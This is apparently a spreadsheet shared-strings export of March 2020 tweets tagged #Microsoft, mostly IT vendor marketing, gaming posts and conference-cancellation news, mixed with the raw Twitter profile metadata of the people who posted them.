    <t>{'id': 102500673, 'id_str': '102500673', 'name': 'Anshuman Sinha', 'screen_name': 'anshuman_usa', 'location': 'Los Angeles', 'description': 'CEO at Optizm Global. The Right Fit Placement Agency. IT Centric Merit based Recruitment Company, Head Hunting, RPO, Staffing', 'url': 'https://t.co/ONbxLaBWtF', 'entities': {'url': {'urls': [{'url': 'https://t.co/ONbxLaBWtF', 'expanded_url': 'http://www.optizmglobal.com', 'display_url': 'optizmglobal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 527, 'friends_count': 1384, 'listed_count': 15, 'created_at': 'Wed Jan 06 22:35:14 +0000 2010', 'favourites_count': 21009, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4535,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'http://pbs.twimg.com/profile_images/1075837388780273664/975RTNgx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075837388780273664/975RTNgx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102500673/1496771736',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</si>
  <si>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01:08:01 +0000 2020</t>
  </si>
  <si>
    <t>Before growth, comes reflection
Catch me on Twitch: Zillla_TheGod
#GodTier #masseffect #destiny #warframe #streamer #halo #mixer #montage #compilation #console #Microsoft #Xbox #SeriesX #PS5 #Gaming #clip #videogames  #nextgen #abg #zillla #zilllathegod #twitch #streamer https://t.co/QGpVe5AQcm</t>
  </si>
  <si>
    <t>Tue Mar 03 01:07:41 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/zHxgdekCHJ</t>
  </si>
  <si>
    <t>{'id': 404567114, 'id_str': '404567114', 'name': 'David J. Bembry', 'screen_name': 'BembryBusiness', 'location': '#Los Angeles,CA', 'description': 'Bembry Business Solutions, LLC - #Responsive #webdesign #appdevelopment #apps #GlobalPositioning #Digital #Media #Startup #EmailMarketing #SocialMediaMarketing', 'url': 'http://t.co/paZY1Zm3O0', 'entities': {'url': {'urls': [{'url': 'http://t.co/paZY1Zm3O0', 'expanded_url': 'http://bembrybusiness.com', 'display_url': 'bembrybusiness.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2335, 'friends_count': 3556, 'listed_count': 76, 'created_at': 'Fri Nov 04 03:12:41 +0000 2011', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1058,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'http://pbs.twimg.com/profile_images/889268388127686656/-k_clINw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/889268388127686656/-k_clINw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/404567114/1535939344', 'profile_link_color': '485B8A',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</si>
  <si>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Tue Mar 03 01:07:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft invested over $1 billion into developing top-notch security for their cloud so you don't have to. Our engineers are ready to help your business thrive with cutting-edge infrastructure for your data. #Azure #PCProfessional https://t.co/pazoMmpK4B</t>
  </si>
  <si>
    <t>Tue Mar 03 01:06:53 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/e7OLkJyFNd</t>
  </si>
  <si>
    <t>Tue Mar 03 01:06:22 +0000 2020</t>
  </si>
  <si>
    <t>@Riazjavedbutt @AmericanAir Shame on you @AmericanAir for not doing the right thing! @Delta and other airlines are helping out my fellow #Microsoft MVPs because our #MVPSummit got canceled due to the #coronavirus</t>
  </si>
  <si>
    <t>{'id': 32519698, 'id_str': '32519698', 'name': 'Christina Wheeler #PowerAddict', 'screen_name': 'cwheeler76', 'location': 'Georgia, USA', 'description': 'Microsoft MVP | Principal Solution Architect @Canviz | Trainer | Mother | Developer | Photographer | Designer | World Traveler | International Speaker | Author', 'url': 'https://t.co/ZVdTtHHhXh', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZVdTtHHhXh', 'expanded_url': 'https://www.christinawheeler365.com', 'display_url': 'christinawheeler365.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6007, 'friends_count': 2270, 'listed_count': 288, 'created_at': 'Fri Apr 17 18:50:32 +0000 2009', 'favourites_count': 3408, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8985,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'http://pbs.twimg.com/profile_images/1151220522534895618/z0JFbi0s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151220522534895618/z0JFbi0s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32519698/1571200912', 'profile_link_color': '363636', 'profile_sidebar_border_color': '696969', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '696969', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 01:06:04 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/vdaj0wDumo</t>
  </si>
  <si>
    <t>{'id': 1114039719724077056, 'id_str': '1114039719724077056', 'name': 'Nomad Partner Group', 'screen_name': 'NomadPartner', 'location': '', 'description': 'Helping businesses create experiences today, to deliver a better service tomorrow.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 60, 'listed_count': 0, 'created_at': 'Fri Apr 05 05:39:01 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1159, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1114040876508909568/CEyXFQqg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114040876508909568/CEyXFQqg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1114039719724077056/1554443314',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</si>
  <si>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01:02:42 +0000 2020</t>
  </si>
  <si>
    <t>Break down data silos with drag and drop data exploration and interactive reporting with #Microsoft #PowerBI and #Azure. Never miss a post from CloudSolutionIT. Subscribe now! https://t.co/6Z79RsKCOk</t>
  </si>
  <si>
    <t>{'id': 1103116735111032833, 'id_str': '1103116735111032833', 'name': 'Cloud Solution IT', 'screen_name': 'Cloudsolution0', 'location': 'Melbourne, Victoria', 'description': 'An Australian owned and operated company established by a group of experienced Solution Architects.', 'url': 'https://t.co/zTH5lWpgjw', 'entities': {'url': {'urls': [{'url': 'https://t.co/zTH5lWpgjw', 'expanded_url': 'https://cloudsolutionit.com/', 'display_url': 'cloudsolutionit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 335, 'friends_count': 922, 'listed_count': 3, 'created_at': 'Wed Mar 06 02:14:59 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 534, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1106071737404452864/catxByFo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1106071737404452864/catxByFo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103116735111032833/1558386152',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</si>
  <si>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01:02:37 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Impulse Media Plus Design Pty Ltd reduces your risk. https://t.co/MZefIeVzAI</t>
  </si>
  <si>
    <t>{'id': 843105559674937344, 'id_str': '843105559674937344', 'name': 'Impulse Media + Design', 'screen_name': 'Impulse_MPD', 'location': 'Victoria, Australia', 'description': 'Digital Agency, Graphic, Web &amp; Application Development.', 'url': 'https://t.co/cYDZW6fhO3', 'entities': {'url': {'urls': [{'url': 'https://t.co/cYDZW6fhO3', 'expanded_url': 'http://www.impulseinc.com.au', 'display_url': 'impulseinc.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sat Mar 18 14:23:24 +0000 2017', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 216,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'http://pbs.twimg.com/profile_images/1081216588353757186/bTYwQDu7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081216588353757186/bTYwQDu7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/843105559674937344/1574995608', 'profile_link_color': 'ED2024',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</si>
  <si>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01:02:12 +0000 2020</t>
  </si>
  <si>
    <t>Why do governments partner with a specific digital provider? It comes down to 4 main reasons. Learn why public digital transformation works best when powered by #Microsoft. https://t.co/HKiAGywsTp</t>
  </si>
  <si>
    <t>Tue Mar 03 01:01:27 +0000 2020</t>
  </si>
  <si>
    <t>Learning to Fly | Journey to the Savage Planet #5
https://t.co/pragsI9LA7 
#kberrygaming #youtube #pc #gaming #steamgames #steam #ea #kristikberry #epic #epicgames #TyphoonStudios #505Games #adventure #PlayStation #microsoft #ps4 #journeytothesavageplanet</t>
  </si>
  <si>
    <t>Tue Mar 03 01:01:10 +0000 2020</t>
  </si>
  <si>
    <t>Where hybrid cloud is headed next, and Microsoft Azure's role.
#Cloud #Azure #HybridCloud #Microsoft #MicrosoftAzure #MSFT
https://t.co/9qtYTJEpxu https://t.co/euFC1x2qd6</t>
  </si>
  <si>
    <t>Tue Mar 03 01:01:04 +0000 2020</t>
  </si>
  <si>
    <t>The global average cost of a #cyberattack is $3.6 million. Yikes! But don't worry, we can help protect your business. Check out this e-book from #Microsoft to identify the three most common threats: viruses, phishing, and ransomware. https://t.co/Er1GLxXvXr</t>
  </si>
  <si>
    <t>{'id': 58595530, 'id_str': '58595530', 'name': 'Fusion Tech Solutions LLC', 'screen_name': 'ftsllc', 'location': 'Healdsburg, CA', 'description': 'Managed IT service provider -          \nCloud Computing | Computer Repair | Data Backup &amp; Recovery | Network Maintenance &amp; Server Configuration, Security | VoIP', 'url': 'http://t.co/G8Kd89GY8n', 'entities': {'url': {'urls': [{'url': 'http://t.co/G8Kd89GY8n', 'expanded_url': 'http://www.fusiontechnologysolutions.com', 'display_url': 'fusiontechnologysolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 175, 'listed_count': 7, 'created_at': 'Mon Jul 20 21:25:10 +0000 2009', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5577,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'http://pbs.twimg.com/profile_images/603325399200714753/FWjQu48Q_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/603325399200714753/FWjQu48Q_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58595530/1432679349',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</si>
  <si>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Tue Mar 03 01:00:42 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft  - How to Install Azure Portal App on Windows Server 2019 #ws2019 #Azure #portal #winserv #Cloud #Hybrid  https://t.co/ImJlZHU8q3</t>
  </si>
  <si>
    <t>Tue Mar 03 01:00:16 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/XcWTklOqNq</t>
  </si>
  <si>
    <t>Tue Mar 03 00:58:11 +0000 2020</t>
  </si>
  <si>
    <t>Broadcast Engineering Hot Topics: IP, Interoperability and the Value of Integration https://t.co/wuv690Rptb
For more info: https://t.co/oPnjmmhtVq #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT https://t.co/9ikXapziAN</t>
  </si>
  <si>
    <t>Tue Mar 03 00:57:12 +0000 2020</t>
  </si>
  <si>
    <t>Staying on top of Office 365 Updates https://t.co/GWwTC8yJSe #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 00:51:03 +0000 2020</t>
  </si>
  <si>
    <t>Really sad about #MVPSummit replaced by an Online only event due to #COVID19. Even though I think it is a reasonable decision made by #Microsoft</t>
  </si>
  <si>
    <t>{'id': 100590316, 'id_str': '100590316', 'name': 'Javier Villegas', 'screen_name': 'javier_vill', 'location': 'General Pacheco, Argentina', 'description': 'Microsoft MVP Data Platform. DBA SQL Server since 6.5 - from Gral. Pacheco, Argentina. Soccer Fan (Velez Sarsfield). https://t.co/cUaGxHdLpx', 'url': 'https://t.co/LudMoC7OLX', 'entities': {'url': {'urls': [{'url': 'https://t.co/LudMoC7OLX', 'expanded_url': 'http://www.javiervillegas.com.ar', 'display_url': 'javiervillegas.com.ar', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/cUaGxHdLpx', 'expanded_url': 'http://sql-javier-villegas.blogspot.com/', 'display_url': 'sql-javier-villegas.blogspot.com', 'indices': [117, 140]}]}}, 'protected': False, 'followers_count': 691, 'friends_count': 1307, 'listed_count': 43, 'created_at': 'Wed Dec 30 20:38:30 +0000 2009', 'favourites_count': 2878, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2778,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'http://pbs.twimg.com/profile_images/1054198028356202497/CoINitmx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054198028356202497/CoINitmx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100590316/1581189112',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</si>
  <si>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00:49:33 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 00:48:22 +0000 2020</t>
  </si>
  <si>
    <t>Free wifi in DEN was good enough to catch a scrap with (maybe?) Some dev's from the #343industries team.  Tried to hop on when I landed in DTW... but wifi here sux.  Still, massively cool to test out #microsoft... https://t.co/OQmpSGRVzT</t>
  </si>
  <si>
    <t>{'id': 2220828523, 'id_str': '2220828523', 'name': 'Tiki', 'screen_name': 'tikigonewild', 'location': 'SD/VA', 'description': 'VA native in San Diego for a long while for work', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 124, 'listed_count': 2, 'created_at': 'Fri Nov 29 04:40:06 +0000 2013', 'favourites_count': 519, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 513,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'http://pbs.twimg.com/profile_images/512199798787932161/7SM8BuNt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/512199798787932161/7SM8BuNt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2220828523/1385701404',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</si>
  <si>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00:45:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Excel - Beginner to Advanced - 94% OFF - Regular ($399.00) - Now Only $19.99
[Register] - https://t.co/E0wW8HfRog
#Microsoft #SachinDean #YouAccel #Courses #Learn #Learning #Knowledge 
Quickly learn A-Z of Excel 2016 - Pivots, Charts, Functions, Data Analysis!</t>
  </si>
  <si>
    <t>Tue Mar 03 00:45:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft just canceled two conferences ahead of their major ones https://t.co/lfAvpxGY2M https://t.co/jg4m63QvR9</t>
  </si>
  <si>
    <t>Tue Mar 03 00:44:45 +0000 2020</t>
  </si>
  <si>
    <t>MCAS TIP: Reduce False Positives on Impossible Travel Alert
By default, #Microsoft Cloud App Sec will report an Impossible Travel even if it is a failed sign-in. You can override this so that it only considers successful sign-ins. This is recommended to avoid unnecessary alerts</t>
  </si>
  <si>
    <t>{'id': 4699519645, 'id_str': '4699519645', 'name': 'Patriot Consulting', 'screen_name': 'PatriotExperts', 'location': 'San Francisco, CA', 'description': 'We help companies maximize and secure their investment in Microsoft Office 365 and Skype for Business in the shortest time possible.', 'url': 'https://t.co/otRwnl7jAr', 'entities': {'url': {'urls': [{'url': 'https://t.co/otRwnl7jAr', 'expanded_url': 'https://twittercounter.com/', 'display_url': 'twittercounter.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 158, 'friends_count': 628, 'listed_count': 5, 'created_at': 'Sun Jan 03 00:30:38 +0000 2016', 'favourites_count': 354, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 636, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/683459646183485440/69INH1Ba_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/683459646183485440/69INH1Ba_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4699519645/1504288258',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</si>
  <si>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00:43:14 +0000 2020</t>
  </si>
  <si>
    <t>#Technology #news 21st to 28th February 2020: #AI #AIEthics #CatholicChurch #Microsoft #IBM #Samsung #coronavirus #US #FCC #ATT #Verizon #Sprint #TMobile #data #TikTok #skullbreakerchallenge #Sony #5G #xperia1II #Apple #India #Tesco #cashless #London https://t.co/5tmqLo6oSf</t>
  </si>
  <si>
    <t>{'id': 996017079106113536, 'id_str': '996017079106113536', 'name': 'Tech World Oracle', 'screen_name': 'TechWorldOracle', 'location': 'London, England', 'description': 'Nothing stays the same! Trying to keep up and make sense of technological changes. @TechWorldOracle is an online space and home for technology news.', 'url': 'https://t.co/GLyFYU3ppl', 'entities': {'url': {'urls': [{'url': 'https://t.co/GLyFYU3ppl', 'expanded_url': 'https://techworldoracle.wordpress.com', 'display_url': 'techworldoracle.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 403, 'friends_count': 714, 'listed_count': 2, 'created_at': 'Mon May 14 13:19:11 +0000 2018', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 327, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1073169659006992386/M3xAnjMx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1073169659006992386/M3xAnjMx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/996017079106113536/1529837372',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</si>
  <si>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00:40:57 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Nemty Ransomware Punishes Victims by Posting Their Stolen Data:" https://t.co/4rik0BWmmN
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 00:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution
- a Microsoft cloud-based print infrastructure that will enable a simple, rich and secure print experience for users and help reduce time and effort for IT
https://t.co/ljwU4sskt7
#Azure #Microsoft #Cloud #Printing https://t.co/8qDqDEMMZ8</t>
  </si>
  <si>
    <t>Tue Mar 03 00:32:26 +0000 2020</t>
  </si>
  <si>
    <t>Google cancels Cloud Next because of coronavirus, goes online-only https://t.co/niOrMEly7u #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 00:31:03 +0000 2020</t>
  </si>
  <si>
    <t>To receive updates from Prakash Software Solutions Pvt Ltd, and to learn more about how we can help with Applications and Infrastructure, subscribe today!    #azure #microsoftazure #microsoft #azuremigrationcenter https://t.co/MC0gQgPamD</t>
  </si>
  <si>
    <t>Tue Mar 03 00:30:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure got some updates!
Microsoft Announcements on Azure Artificial Intelligence
https://t.co/RvYKtN6CGt
#microsoft #microsoftmonday #azure #technology</t>
  </si>
  <si>
    <t>Tue Mar 03 00:27:19 +0000 2020</t>
  </si>
  <si>
    <t>The Humble Book Bundle: Business Intel by Packt is LIVE!
https://t.co/NSaWLXMHdJ (Supports @onelifetolive) #business #data #Microsoft 
Take all that data and visualize it by learning the ins and outs of Tableau, Power BI, and Qlik Sense!</t>
  </si>
  <si>
    <t>{'id': 574647893, 'id_str': '574647893', 'name': 'Indie Kings', 'screen_name': 'IndieKings', 'location': '', 'description': 'PC Gaming Community - from gamers, for gamers! ðŸŽ®', 'url': 'https://t.co/4Y8GzJy623', 'entities': {'url': {'urls': [{'url': 'https://t.co/4Y8GzJy623', 'expanded_url': 'http://www.IndieKings.com/', 'display_url': 'IndieKings.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 112936, 'friends_count': 35938, 'listed_count': 310, 'created_at': 'Tue May 08 17:31:49 +0000 2012', 'favourites_count': 2215, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21441,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'http://pbs.twimg.com/profile_images/1161007052795326470/a5oPVDvR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161007052795326470/a5oPVDvR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/574647893/1565641042', 'profile_link_color': 'FF691F',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'regular'}</t>
  </si>
  <si>
    <t>Tue Mar 03 00:27:08 +0000 2020</t>
  </si>
  <si>
    <t>Running Azure IoT Edge on Yocto Linux https://t.co/OahXzvj3LW #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 00:26:39 +0000 2020</t>
  </si>
  <si>
    <t>Great app from #Microsoft Combines all office tools into one rather than splitting them as #Google does https://t.co/Un0pg5UYwf</t>
  </si>
  <si>
    <t>{'id': 1232832083925405697, 'id_str': '1232832083925405697', 'name': 'Jar Freeman', 'screen_name': 'JarFreeman', 'location': 'Tokyo-to, Japan', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Thu Feb 27 00:57:52 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1232838631854788608/QNjQJNbN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232838631854788608/QNjQJNbN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232832083925405697/1582777399',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</si>
  <si>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00:25:02 +0000 2020</t>
  </si>
  <si>
    <t>Our own Rich Baumet will be speaking at the upcoming @sqlpass in Victoria, March 14! This free training event focuses on the #Microsoft data platform and everything from data management, analytics, business intelligence, and more. Register: https://t.co/mfKPm9R858 #SQLSATVictoria https://t.co/ebYCnvGFRG</t>
  </si>
  <si>
    <t>{'id': 340451546, 'id_str': '340451546', 'name': 'Softlanding', 'screen_name': 'softlandinginc', 'location': 'Vancouver, BC', 'description': 'Helping customers improve productivity with innovative solutions through #Azure, #BI, #SharePoint, Cloud, Custom Dev, and Managed IT Support Services', 'url': 'https://t.co/eHoaLnJR7G', 'entities': {'url': {'urls': [{'url': 'https://t.co/eHoaLnJR7G', 'expanded_url': 'http://softlanding.ca', 'display_url': 'softlanding.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1038, 'friends_count': 1209, 'listed_count': 104, 'created_at': 'Fri Jul 22 18:32:13 +0000 2011', 'favourites_count': 2348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3799, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DBD8D7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/719564975316938753/pTivm7Jf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/719564975316938753/pTivm7Jf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/340451546/1562950441', 'profile_link_color': 'EB4024',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</si>
  <si>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Tue Mar 03 00:24:52 +0000 2020</t>
  </si>
  <si>
    <t>@Office can you fix your subscription based software once and for all. So sick of getting this rubbish even on brand new clean installations!
#TechFail #OfficeIsInstallingInTheBackground #Frozen #Office365 #Microsoft https://t.co/TeqJsxkAP7</t>
  </si>
  <si>
    <t>{'id': 2511522697, 'id_str': '2511522697', 'name': 'Michael Bassett', 'screen_name': 'AndNowItsTime', 'location': 'An Uber Away', 'description': 'Professionally Prohibited From Public Social Media Accounts | Homo Sapien | Avid Sports Fan | #DaddyGang | #EastsToWin | #COYB | #Colts | #ProudlySydney |', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 510, 'friends_count': 249, 'listed_count': 55, 'created_at': 'Wed May 21 00:42:05 +0000 2014', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1051,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'http://pbs.twimg.com/profile_images/1038282374109229056/Ebw0G-DP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1038282374109229056/Ebw0G-DP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2511522697/1460875933',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</si>
  <si>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00:23:28 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft just canceled two small conferences ahead of their major ones https://t.co/nbnioN6lBp #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 00:13:36 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/jznBGVgvNK</t>
  </si>
  <si>
    <t>Tue Mar 03 00:13:13 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, Digital6 Technologies delivers the data, security and AI you need to build an agile data estate. https://t.co/4DCjDTNiHP</t>
  </si>
  <si>
    <t>{'id': 1382154146, 'id_str': '1382154146', 'name': 'David Fraas', 'screen_name': 'digital6tech', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 35, 'listed_count': 0, 'created_at': 'Fri Apr 26 15:12:20 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 897,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'http://pbs.twimg.com/profile_images/910988879045517312/sAdiWkyc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/910988879045517312/sAdiWkyc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1382154146/1520888522',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</si>
  <si>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Tue Mar 03 00:13:05 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/jtbRhM2bYV</t>
  </si>
  <si>
    <t>{'id': 586646555, 'id_str': '586646555', 'name': 'AxisInternet, Inc.', 'screen_name': 'axisinternetinc', 'location': 'Denver, Colorado', 'description': 'Internet Access The Way It Should Be! The Best in VoIP at http://t.co/tvbTdTx30G!', 'url': 'http://t.co/fXsT6AW4gR', 'entities': {'url': {'urls': [{'url': 'http://t.co/fXsT6AW4gR', 'expanded_url': 'http://www.axint.net', 'display_url': 'axint.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/tvbTdTx30G', 'expanded_url': 'http://www.axis-voip.com', 'display_url': 'axis-voip.com', 'indices': [58, 80]}]}}, 'protected': False, 'followers_count': 54, 'friends_count': 239, 'listed_count': 3, 'created_at': 'Mon May 21 15:51:19 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 517,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'http://pbs.twimg.com/profile_images/961704614247653376/Z5thvo8m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/961704614247653376/Z5thvo8m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/586646555/1366825935',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</si>
  <si>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Tue Mar 03 00:12:51 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/k15dWr2Dzx</t>
  </si>
  <si>
    <t>Tue Mar 03 00:11:52 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/AXz5Nj6BVq</t>
  </si>
  <si>
